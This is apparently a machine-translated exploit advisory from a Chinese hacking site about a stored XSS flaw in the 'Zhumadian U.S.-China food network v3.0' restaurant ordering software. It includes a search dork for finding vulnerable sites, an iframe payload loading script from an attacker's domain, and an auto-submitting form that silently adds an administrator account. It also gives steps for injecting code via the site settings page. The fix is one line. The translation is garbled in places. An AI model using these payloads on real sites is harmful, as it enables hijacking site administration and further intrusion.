Zhumadian-day U.S.-China food network v3. 0 Business Edition XSS add management-vulnerability warning-the black bar safety net

ID MYHACK58:62201128749
Type myhack58
Reporter 佚名
Modified 2011-01-02T00:00:00


Version:Zhumadian days of the U.S. Food network v3. 0 Business Edition Keywords:inurl:wenhua_display. asp XSS Code: <iframe src=http:// 空间 的 域名 /xss.html < Html Code: <form name="admin" action="http:// 这里 目标 站 域名 /admin/admin_add_save.asp" method="POST" onSubmit="return validate(this)"> <input type="text" name="username" value="this is account number"> <input type="text" name="password" value="here is the password"> <input type="submit" value="OK submit" name="B1" class="buttonface"> </form> < body onload="javascript:document. forms[0]. submit()"></body><SPAN style="DISPLAY: none" _fck_bookmark="1"> </SPAN>

Exp: The first modified Html Code is transmitted to your space In ordering discount just selected a branch,then select the[online booking]name and phone, submittedXSS code, And other back office management open[online order]time of departureXSS,run the html form,Add to manage successfully. Add into the background,[Site Settings]in the inserted phrase,connected http://here, the destination Station Name/setup. asp My local test,not the connecting word,we test it,anyway, [Site Settings]Save to/setup. asp

Front Desk submit:


Background open online after the order,is added to the management:

! Repair method:the filter file yuding. asp the data submitted.